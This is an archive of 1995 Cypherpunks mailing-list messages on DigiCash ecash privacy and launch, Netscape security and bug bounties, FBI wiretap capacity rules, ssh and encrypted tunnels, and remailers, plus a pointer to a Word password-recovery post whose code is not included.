Date: Sun, 22 Oct 95 23:01:03 PDT
To: llurch@Networking.Stanford.EDU
Subject: Microsoft "Encrypted" Documents Hack FYI
Message-ID: <199510230600.XAA01477@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I would provide the hack itself, but I'm on a Mac that lacks a proper
Base64 handler at the moment. For people who only know how to use
Netscape, the URL is news:465l8h$6sa@oznet03.ozemail.com.au.

-rich

From: lyal collins <lyalc@ozemail.com.au>
Newsgroups:
alt.security,comp.os.ms-windows.apps.misc,comp.os.ms-windows.win95.misc
Subject: Re: More Microsoft Security Bugs
Date: 19 Oct 1995 13:53:21 GMT
Organization: not very, at the moment
Lines: 366
Message-ID: <465l8h$6sa@oznet03.ozemail.com.au>
References: <llurch-1510951157410001@tip-mp3-ncs-3.stanford.edu>
NNTP-Posting-Host: slsyd3p02.ozemail.com.au
Mime-Version: 1.0
Content-Type: multipart/mixed;
        boundary="-------------------------------297591414826100"
X-Mailer: Mozilla 1.22 (Windows; I; 16bit)

Further to word document password protection, the attached offer a simple 
way to recover text in such files with this "protection".
The source is included - at least one shwareare developer has taken up 
on this technique and releases a VB based version.
cheers, lyal

-rich graves, llurch@networking.stanford.edu
 moderator of the win95netbugs list
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html
 My old PGP key has been compromised. Please finger this account
 for the revocation certificate and my new key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Oct 95 21:45:02 PDT
To: cypherpunks@toad.com
Subject: Re: Reducing the Flames, Attacks, and Nit-Pickings
Message-ID: <acb06aea5b021004cdd9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:25 AM 10/23/95, Todd Glassey wrote:
>>At 2:18 AM 10/22/95, Todd Glassey wrote:
>>
>>>As an aside - What blows my mind is the number of cycles people spend
>>>bitching and moaning about Java itself rather than working to create a
>>>better solution.
>
>
>My apologies, I should have taken this off-line with Dr. Fred. I did in my
>response to him as I had some personal commentary to add which would have
>beebn inappropriate to the list in general.

Just to make things clear, when I quoted Todd Glassey's point (above), it
was because I _agreed_ with his point about the "bitching and moaning"
about Java, as an example. I was _not_ quoting it as an example of the
flames on the list, per se.

My concern is that the Cypherpunks list is evolving into a "bug list,"
concentrating on attacks on commercial products. As I've said, finding
major flaws in protocols is a useful thing to do, but having the list
focussed on debating the fine details of languages like Java and browsers
like Netscape seems to be less useful.

Worse, idle speculation about possible security flaws seems wasteful.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 22 Oct 95 22:06:17 PDT
To: cypherpunks@toad.com
Subject: Chaum's cash: backup?
Message-ID: <199510230504.WAA22965@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


(I congratulate Chaum on his ecash trial. this is a milestone.)

the recent Chaum press release and information says that cash is
"downloaded" to your local computer. 

here is my question: of course, I'm sure they have some kind of
a backup system. would someone care to comment on it? 

say I download $1000 to my hard drive and it crashes. what to do?

if it was like "real" cash, then it really would be lost.

if it wasn't like real cash, and the bank was actually tracking
it, then they could determine whether it had been "spent" so far
or prohibit someone from "cashing it in" like a hold on a check.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sun, 22 Oct 95 21:35:23 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510230253.TAA08888@jobe.shell.portal.com>
Message-ID: <199510230435.WAA03625@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 I, Bryce <bryce@colorado.edu>, wrote:
>
> Is there a scheme which will prevent this collusive payee 
> identification, and if so where can I read about it? 


 The entity calling itself "Hal" <hfinney@shell.portal.com> allegedly wrote:
> 
> One proposal I have seen here is to have a "coin changer" service which
> turns the received coin in at the bank for you. Then the payer and the
> bank and the coin changer all have to collude to identify you.  However
> you have to trust the coin changer not to steal your money.  So it better
> be a pretty trustworthy organization.


Especially since you didn't want anyone to know that you had that
coin in the first place.  This makes it somewhat more difficult to
announce to the world "Hey!  He just stole my coin!".


 I, Bryce:
> Now even if it were the case that the payee is always identifiable
> by a collusion of the bank and the payer (such as is the case in
> DigiCash Ecash), all this means is that you shouldn't accept a coin
> using one nym, and deposit it in the bank using another.  You need
> one bank account per nym, as well as one bank account per
> anonymous transaction, and then you have complete control over
> revelation of your identit(y/ies).


 "'Hal'":
> 
> It would still be less than perfect to have all of a given nym's
> transactions known.  In an ideal electronic cash system no transactions
> are linkable if the participants don't want it.


Careful here.  A given nym's transactions are known only if the
person that they were dealing with chooses to collude with the bank
and reveal it.  Hopefully this would not be the status quo!  (If the
status quo is going to be non-privacy, then we will be using a
different scheme in the first place...)


I mean: it is always true that a person who gave you money can say
"yeah, that's the guy I gave it to."  The only way that this is 
different from tangible cash is that the payer can *prove* to the 
bank that you are the recipient of their money.  And probably the 
bank and the payer together can prove it to the rest of the world.  
(Hm.  Would they be able to prove it?  Perhaps the only way they 
would be able to prove that would be to time-stamp all their 
coins!...)


 "'Hal'":
> In such a system you don't need an "account" as such, but rather the bank
> simply allows used cash to be checked and exchanged for fresh cash via
> anonymous connections.  This would be the most privacy-protecting system.


Again I see an opportunity for "polymorphism".  A bank can use the
very same, or at least a very similar protocol to service both
account-holders and "check-in/check-out" customers.  (Perhaps the
only differences would be the speed with which the bank services the
requests, and the rate at which the bank charges for the service.)


I am excited about polymorphism (such as 
<a href="http://www.communities.com/paper/agnostic.html> Douglas
Barne's "identity-agnostic" idea </a>) because of
social-engineering, evolutionary reasons.  Flexible protocols will
encourage institutions to compete by offering as much privacy,
security, off-line capability, efficiency, etc. as the customers
want, rather than dictating their own terms and trying to define the
market that way.  To the degree to which each capability is
economically beneficial, that capability will become the market
standard.


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIsaU/WZSllhfG25AQE4DgP7BoRHvHCXkS70z/612TW+QFxt8ZG5pN2t
DDAlHGJrqmQarCwpOuYB9FuPFb4Nw2vNUgqWE30/q0oe0uJvkbgrFgMTvRPX9w0P
KfKoboTP7LqpPMJzbtsp4eES8Rqw8IF3j5ZQnsXxln5sdpQwztOT9HfXF62VoLsm
Ln3bmGb2vPc=
=1RxY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 22 Oct 95 22:53:26 PDT
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: Chaum's cash: backup?
Message-ID: <199510230553.WAA08339@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 PM 10/22/95 -0700, Vladimir Z. Nuri wrote:
>say I download $1000 to my hard drive and it crashes. what to do?
>
>if it was like "real" cash, then it really would be lost.

It is really lost.

Your disk drive contains information the bank *cannot* know.

If you do not know that information either, you cannot prove to
the bank or anyone else that you rightfully possess a legitimate coin.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <remailer-admin@ideath.goldenbear.com>
Date: Sun, 22 Oct 95 23:30:44 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510230540.AA22467@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text/plain


Was at a party Friday night and ended up having a few beers with a 
friend who works at a medium-large software publisher.  Turns out his
company recently received a letter from Netscape to the effect that
"we've noticed that there are 'x' copies of Navigator active
at your site - you should remember that commercial use requires a 
license fee", etc.  The friend didn't know if the count was per IP
address or per "magic cookie installation" (see discussion of a 
few weeks prior) or some other metric.

Not that getting paid for your work is evil, but it looks like Netscape's
interest in the use of its browser goes beyond simple curiosity or the
sales of advertising to third parties. 

Is the bean counter number sent to every site, or just to .netscape.com
sites?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 22 Oct 95 22:50:39 PDT
To: cypherpunks@toad.com
Subject: digicash & unix clients
Message-ID: <199510230545.WAA15604@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I haven't seen any listing of the platforms supported by the
live digicash system. Does anyone know where that information is
available? Thanks.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Lewton <clewton@netcom.com>
Date: Sun, 22 Oct 95 22:57:13 PDT
To: sameer <sameer@c2.org>
Subject: Re: digicash & unix clients
In-Reply-To: <199510230545.WAA15604@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951022225330.24993A-100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Oct 1995, sameer wrote:

> 	I haven't seen any listing of the platforms supported by the
> live digicash system. Does anyone know where that information is
> available? Thanks.
> 

Ecash-info@marktwain.com  or  1-800-684-5623


> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:	 510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org (or login as "guest")			sameer@c2.org
> 

Chuck




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sun, 22 Oct 95 22:25:40 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Chaum's cash: backup?
In-Reply-To: <199510230504.WAA22965@netcom18.netcom.com>
Message-ID: <199510230524.XAA05319@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "Vladimir Z. Nuri" <vznuri@netcom.com> 
 allegedly wrote:
>
> here is my question: of course, I'm sure they have some kind of
> a backup system. would someone care to comment on it? 
> 
> say I download $1000 to my hard drive and it crashes. what to do?
> 
> if it was like "real" cash, then it really would be lost.
> 
> if it wasn't like real cash, and the bank was actually tracking
> it, then they could determine whether it had been "spent" so far
> or prohibit someone from "cashing it in" like a hold on a check.


Well the smart thing to do is keep multiple, well-protected copies
of your cash under your own control.  I don't really know what that
press release was referring to.  Perhaps it was saying that by
revealing your blinding factor you can reveal yourself as owner of
that coin and have that coin cancelled and re-sent to you.


To my mind, if you have kept a copy of the blinding factor, you
might as well have kept a copy of the coin...



Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIsm5vWZSllhfG25AQGs2gP9GhwPNDFd6C/FkNpH0/9fIQCxdD+JbdoJ
cDxGDaIaOEIdMWn8X0tBaE5Ml6RQz3XUsSCz5Yqp6tQ00KSsbYaWs+CK2/zY1dp+
sxTalu6S0+qmIivh39+X3w2pGzDuUznhd1c5rxLXUIlZO7TM9g3XGv5jm7DBnC4M
ve43K6q5fK0=
=2xcG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 22 Oct 95 23:48:46 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
Message-ID: <199510230647.XAA22697@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:
>zoetrope@infinet.com wrote:
>>      Why would a compony like Netscape jeapordise themselves by even
>> letting out a beta version so hackers have time to find bugs before the
>> full version is released. Don't take me wrong I have only been on the net
>> fer a little over a year and Love Netscape.  And If I knew what I was
>> Doing I would love to help them..... 
>
>  The reason we do it is that without wide exposure outside the
> company, it is virtually impossible to get complete testing coverage.

I see.  Who has netscape retained to review its software.  Can we have 
some public names who will vouch for the "partial testing coverage" 
before exposing it to the world??  Firms who will put their name 
on the line and say that Netscape meets all of the security guidelines 
say of the IETF -- the Internet Engineering Task Force??

Or does Netscape feel that International judgement will not matter??

> Given the incredible variety of machines, OS's, peripherals, etc.
> that are available in the real world, there is no way we could
> re-create every possible configuration in the lab.

All the more reason I guess to stick to standard.  Or don't you agree??

We're not asking you to re-create every possible configuration, but have 
you benchmarked Netscape against any standards at all??  And which ones??

>   We also can't visit every web page, or think of every combination
> of features that clever people in the real world come up with every
> day.  

This is true.  You can't visit every web page.  So what assumptions did 
you start off with when you first started your code design??  Did you 
read the appropriate memorandums upon which the Internet is built?

Did you assume that every server would be trustworthy??  That would be
extremely negligent.  That's like a bank trusting everyone who comes in
and asks if the bank can cash a check for them.

Any comments, Netscape??  Or are you still not making "official" statements.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 22 Oct 95 23:53:34 PDT
To: Bryce <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510230348.VAA02972@nagina.cs.colorado.edu>
Message-ID: <Pine.SOL.3.91.951022233806.16282B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Oct 1995, Bryce wrote:

> Now it seems to me that any ecash scheme, whether cleared on-line or
> off-line, with or without double-spending-detection, will put the
> payee at risk of identification by a collusion of the payer and the

I can't remember off hand, but isn't blinding transitive? If so, there's 
an obvious way to get two way anonymity with an on-line system. If Alice 
wants to pay Bob $10, then Bob could prepare the usual squillion copies 
of the note, each with a serial number known only to Bob, then blind them 
and send them to Alice. 

Alice would then reblind them and send them to Nick, the banker. Nick
would then pick one of the notes, and ask Alice for the blinders for the
rest. Alice would then ask Bob for his blinders for the rejected notes,
and would forward both sets on to Nick, who would check them, and if
they're legit, sign the remaning copy, and return it to Alice.  

Alice cound then remove her blinding factor, and sent the result on to
Bob. Bob then removes his blinding factor, and can now spend the coin. 

Since Alice doesn't know the serial number, she can't reveal it to Nick 
so that he can find out who deposits the coin. Also, since Nick doesn't 
know the serial number, he can't collaborate with Bob to find out who 
Alice is. 

Does this work, or am I missing something?

Simon

---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RobL <robl@on-ramp.ior.com>
Date: Sun, 22 Oct 95 23:57:43 PDT
To: Jim.Cannell@f21.n216.z1.fidonet.org (Jim Cannell)
Subject: Re: FidoNet Remailer
Message-ID: <m0t7Gp1-000RpFC@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:34 PM 10/20/95 -0400, Jim Cannell wrote:
>
>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I have been a long time lurker on this list, as well as having a long time
>interest in crypto.  Most of my activity in this area has been on FidoNet
>rather than the internet.  Due to the control phreak nature of much of
>FidoNet, I've spent a lot of time and effort in an attempt to just simply
>route around the bastards.  I created the SecureMail system, which is a
>network of FidoNet nodes that agree to route any and all traffic without
>monitoring or censorship.  Within SecureMail, encrypted traffic is not
>only permitted, it is encouraged.


At the end of the month, I will be putting my BBS back online with new
software which is more Fido friendly than what I had been using.. I would be
interested in your SecureMail system as an alternative to the mind-numbing
strickness normally associated with FidoNet.. Any chance I can get more info?

Thanks-
RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 23 Oct 95 00:21:33 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510230720.AAA15634@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>> 	The idea that Netscape (like Microsoft) thinks they can get free
>> testing services from all over the net by real experts just by offerring
>> a tee shirt is down right offensive.
>
>   
>THE NETSCAPE BUGS BOUNTY 
>
>(major snip)   
>   
>   And if the security bug you find is severe as defined by Netscape, and
>   hasn't been previously found, and can be reproduced by us, we'll write
>   you a check for $1000. 

Ha!  I reported a serious problem to Netscape ten days ago, on Thursday
the twelfth.  They haven't even returned an answer to my email yet nor
even acknowledged its receipt. 

Yep, I guess that their check is in the mail ....

Has anyone else seen or heard anything??  T-shirt's, mugs, checks, or 
email being returned or answered??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 22 Oct 95 22:28:47 PDT
To: cypherpunks@toad.com
Subject: Freeh wants to wiretap millions
Message-ID: <Pine.SOL.3.91.951023011300.27963E-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Excerpt from latest CDT bulletin...

Mr. (Un)Freeh wants to be able to monitor (perhaps as much as) the most 
troublesome 1% of the population. This would appear to be a rather large 
expansion of telephone wiretapping.

bd

---------- Forwarded message ----------
[Excerpt]

  CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST Number 26                      October 20, 1995

CONTENTS: (1) FBI Announces Digital Telephony Surveillance Capacity Request
          (2) Subcribe To The CDT Policy Post Distribution List
          (3) About CDT, Contacting Us


(1) FBI NOTICE BEGINS DIGITAL TELEPHONY COMPLIANCE PROCESS -- PUBLIC
    ACCOUNTABILITY FOR FBI REQUEST ESSENTIAL

On Monday October 16 1995, the FBI published its initial request for
surveillance capacity as required under Section 104 (a) of the
Communications Assistance for Law Enforcement Act (PL 104-144, a.k.a.
Digital Telephony).  As required by law, the FBI will accept public
comments on the proposed capacity requirements for 30 days (ending November
15, 1995).  The notice, which includes instructions for submitting
comments, is attached below.

[...]

SURVEILLANCE CAPACITY REQUIREMENTS

Section 104 of CALEA requires telecommunications carriers to ensure that
their systems posses sufficient capacity to accommodate a specified number
of simultaneous intercepts, pen register, and trap and trace devices.  As
required by Section 104 (a)(1), the FBI, after consultation with state and
local law enforcement officials and the telecommunications industry, has
published an initial notice or capacity requirements.  Section 104 (a)(1)
requires that the FBI seek public comment and then publish in the federal
register and provide to telecommunications carriers:

[...]

CATEGORY I -- Areas With Heavy Surveillance Activity

Large urban areas and other areas the FBI estimates require the greatest
surveillance capacity would fall under Category I [page 53646, see below].

ACTUAL CAPACITY: .5% of engineered capacity, or 500 simultaneous
surveillance orders for each equipment, facility, or service serving
100,000 subscribers.

MAXIMUM CAPACITY: 1% of engineered capacity, or 1000 simultaneous
surveillance orders for each equipment, facility, or service serving
100,000 subscribers, by 1998.
_______________________________________________________________________

[...]

[editor's note -- Appendicies have been deleted to save spae.  The entire
text of this document can be found at CDT's Digital Telephony Web Page,
URL:http://www.cdt.org/digtel.html]

Dated: October 10, 1995.

Louis J. Freeh,
Director.

[FR Doc. 95-25562 Filed 10-13-95; 8:45 am]
BILLING CODE 4410-02-M

---------------------------------------------------------------------------
(3) HOW TO SUBSCRIBE TO THE CDT POLICY POST LIST

To subscibe to the policy post distribution list, send mail to
"Majordomo@cdt.org" with:

    subscribe policy-posts

in the body of the message (leave the subject line blank)
[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 23 Oct 95 02:53:19 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510230100.DAA00697@soikko.cs.hut.fi>
Message-ID: <Pine.SUN.3.91.951023022123.9641C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Oct 1995, Tatu Ylonen wrote:

> Are you familiar with ssh [http://www.cs.hut.fi/ssh]?  It has many of
> the features that you are planning.

I saw the announcement for ssh a while ago, but didn't get a copy because
it doesn't run under MS Windows.  I just downloaded a copy today and read
some of the documentation.  It apparently has many of the features I
talked about, plus lots more. 

However, I probably won't give up ETT yet, because there are some design 
differences that would make ETT more useful in certain circumstances.  
SSH seems to be design mainly as a secure telnet program, with TCP port 
redirection added on, which suggests (although I'm not sure) that you 
need to have an user account on the SSH server to connect to it.  It also 
does not seem to do any filtering of TCP redirection requests.  Chaining 
would not work well with SSH because of its packet overhead.

I'll try to get SSH working soon, but so far I am very impressed with it.
I am curious, however, about your choice of key exchange and
authentication schemes.  What are the relative advantages of your protocol
over a more straight-forward DH + signature of exchange values?  DH would
provide forward secrecy directly without the need to change the server key
every hour. 

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sun, 22 Oct 95 16:49:15 PDT
To: weidai@eskimo.com
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.SUN.3.91.951021145844.29391F-100000@eskimo.com>
Message-ID: <199510230100.DAA00697@soikko.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> an ETT client and an ETT server, using Diffie-Hellman and DSA for

You are aware that RSADSI claims they have exclusive licensing rights
for DSA?

Are you familiar with ssh [http://www.cs.hut.fi/ssh]?  It has many of
the features that you are planning.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 23 Oct 95 00:07:48 PDT
To: remailer-operators@c2.org (Remailer Operators List)
Subject: Re: require for new remailer list tag?
In-Reply-To: <199510221604.JAA08498@infinity.c2.org>
Message-ID: <199510230707.DAA22204@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


sameer suggests the creation of a new remailer list property, "permanent",
to denote a remailer expected by its operator(s) to persist indefinitely.

I'm curious about the potential sociological effects of such a move. I
imagine that pseudonyms would be attracted to "permanent" remailers for
use in their reply chains. But this phenomenon could/should be mitigated by
the possibility that sting remailers would tend to advertise themselves as
"permanent" (truthfully, even !), in anticipation of the bias in pseudonym
remailer chain inclusion.

Enemies of anonymity might specially target remailers claiming to be 
"permanent" for antisocial uses.

This is all similar to the effects (observed and supposed) of the existing
reliability ratings for remailers. But the sharp contrast of a binary 
property might make the effects more pronounced.

Perhaps it would be useful/meaningful to note the duration (or
starting date) of each remailer's term of operation, on the theory that past
survival is some indicator of the chances for continued existence.

Anyway, I think it would be an interesting experiment to try.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marcel van der Peijl <bigmac@digicash.com>
Date: Sun, 22 Oct 95 20:47:45 PDT
To: www-buyinfo@allegra.att.com
Subject: Mark Twain Bank Launches Ecash
Message-ID: <199510230347.EAA23772@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


---------------------------PRESS RELEASE------------------------

Release date:                  Contact DigiCash New York:
Monday, October 23, 1995       Mr. Daniel M. Eldridge
Amsterdam, The Netherlands     Tel: +1 212 909 2955 (direct)
                                    +1 212 909 4092 (main)
                               Fax: +1 212 318 1222
                               email: eldridge@digicash.com

Contact DigiCash Amsterdam:    Contact Mark Twain Bank St. Louis:
Mr. Paul Dinnissen             Mr. Frank O. Trotter, III
Tel: +31 20 665 2611           Tel: +1 314 997 9213
Fax: +31 20 668 5486           Fax: +1 314 569 4906
email: press@digicash.com      email: ftrotter@marktwain.com
http://www.digicash.com/       http://www.marktwain.com/


                Mark Twain Bank Launches Ecash
                ==============================

      -----------------------------------------------------
      Mark Twain Bank begins operating DigiCash's ecash(TM)
               on the Internet with U.S. Dollars
      -----------------------------------------------------

     Mark Twain Bank of St. Louis Missouri starts accepting
applications Monday October 23, 1995 for accounts that can be
used to withdraw and deposit ecash over the Internet.
DigiCash(TM) bv, of Amsterdam, the Netherlands, developer of
ecash, is supplying the technology to Mark Twain Bank under
non-exclusive license. The technology has been tested with a
'monopoly(TM) money' currency called CyberBucks(TM), but this U.S.
dollar denominated system is the first time electronic cash is
actually being offered using real currency.

     "This launch marks the beginning of a new era, one in
which the digital equivalent of paper money and coins will
become even more important than their physical precursors are
today," according to Dr. David Chaum, Managing Director of
DigiCash bv and inventor of electronic cash. "It will catalyze
enormous growth in electronic commerce on the Internet, and
prove of enduring value through its improved protection of
consumers and society at large."

     Sweden Post, another ecash licensee, owns the retail bank
that is responsible for more than 50% of value transfers in
Sweden and has direct access to accounts of over 75% of Swedish
households. Sweden Post has not yet announced its launch date.

How does it work
----------------
     Using ecash is like using a virtual ATM (Automatic Teller
Machine). When connecting to it over the Internet, you
authenticate ownership of your account and request the amount of
ecash you want to withdraw, much like in person. But instead of
putting paper cash in your wallet, your software stores the
digital cash it obtains onto the hard disk of your PC.

     When you are asked to make a payment on the net, you
confirm the amount, purpose and payee and then your ecash
software transfers the correct value in coins from your disk.
Sellers, ranging from casual participants in the global Internet
bazaar to mega-retailers, deposit the digital coins they receive
into their accounts.

     Behind the user interface, your computer actually chooses
the serial numbers of the electronic coins based on a random
seed. Then it hides them in special encryption envelopes,
provides them to the virtual ATM for signing, and removes the
envelopes from what is returned--leaving the bank's validating
digital signature on the serial numbers. This way, when the
bank receives from the shop the coins you spend, it cannot
recognize them as coming from any particular withdrawal,
because they were hidden in envelopes during withdrawal. And
thus the bank cannot know when or where you shop or what you
buy.

     The serial number of each signed coin is unique, allowing
the bank to be sure it never accepts the same coin twice. In
case you wish to identify the recipient of any of your
payments, you can also reveal the serial number and prove that
you formed it. And, in case your computer were ever to break
down, if you had written down the secret random seed number you
chose initially when opening your account, future versions
would let you use it to re-create the coins in envelopes and
thereby obtain a free re-issue of the signed coins that were
lost.

How safe is it
--------------
     Security is fundamental to electronic cash. The
cryptographic coding protecting every 5 cent ecash payment is
the same as that routinely relied upon for authenticating
requests to move huge sums between banks and even for national
security. But in principle ecash goes beyond such
communications security to achieve true multiparty security: no
one (buyer, seller, bank) can cheat anyone else, no matter how
they might modify their own software; even if two parties
collude, they cannot cheat the third.

     Replacing paper and coins with ecash would make life much
harder for criminals. Because the payer's computer chooses the
serial numbers of the coins, he or she can later irrefutably
identify blackmarketeers, extortionists, and acceptors of
bribes--were they to take ecash. Paper notes, briefcases full of
which can be received without leaving any record, allow money
laundering and tax evasion today. With ecash, however, all the
amounts each person receives are known to their bank.
Significant criminal activity could thus be thwarted by
completely replacing paper money; moreover, the privacy of ecash
would be essential to widespread acceptance of any electronic
payment system that in effect becomes mandatory.

Early, competing, and future systems
------------------------------------
     Customers of Mark Twain Bank will have to fill out an
application form that is available over the Internet, mail or
fax it in, and receive a password by mail. The bank's unique
multi-currency facilities will allow use from many countries. In
the future, the ability to withdraw funds from ordinary checking
accounts will be as ubiquitous as making withdrawals at physical
ATMs today. Frequent visits to digital branches will give banks
the opportunity to offer a full range of financial services to
their customers.

     The over 60,000 people who registered for the CyberBucks
experiment--more than all the other cyber-payment schemes
combined--suggests a high level of support and interest in
ecash. DigiCash plans to keep the experiment going for those
who wish to continue using it.

     After CyberBucks went live almost exactly one year ago,
and became the first cryptographically protected Internet
payment scheme, a plethora of "me-too" schemes have been
announced. Most are simply account-based, accepting requests
from users to move money from their account to a specified
other account, thereby revealing to the central system exactly
when, how much, and to whom they pay, and putting users at the
mercy of system errors that may result in loss of money or
unexpected lock out. Only ecash works with digital coins,
empowering people with full control over their side of
financial transactions and full control over when and to whom
identifying information is released.

     Ecash is currently software only: once you've opened an
account you just download the software over the net and you're
ready to run. DigiCash is developing chip cards and simple
readers which will give provide even more security and
portability of ecash between machines.

     DigiCash does not aim to operate ecash systems itself, but
rather to continue developing new versions and licensing to
financial institutions.

(The following are trademarks and should always be referred to
as such: CyberBucks, DigiCash, ecash, Mark Twain Bank and
Monopoly.)

*  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *

                  DigiCash Backgrounder
                  =====================

History and Mission
-------------------
     Since beginning operation in April 1990, DigiCash's mission
and primary activity has been: to develop and license payment
technology products--chip card, software only, and hybrid--that
both show the true capability of technology to protect the
interests of all participants and are competitive in the market.

Founder
-------
     Dr. David Chaum, managing director of DigiCash, received
his Ph.D. in Computer Science from the University of California
at Berkeley, then taught at New York University Graduate School
of Business Administration and at the University of California,
and headed the Cryptography Group at CWI, the Dutch nationally
funded center for research in mathematics and computer science,
before taking his current position. He has published over 45
original technical articles on cryptography and also founded the
International Association for Cryptologic Research.

DigiCash Products
-----------------
Blue: smart card technology for EMV & prepaid with dynamic public key
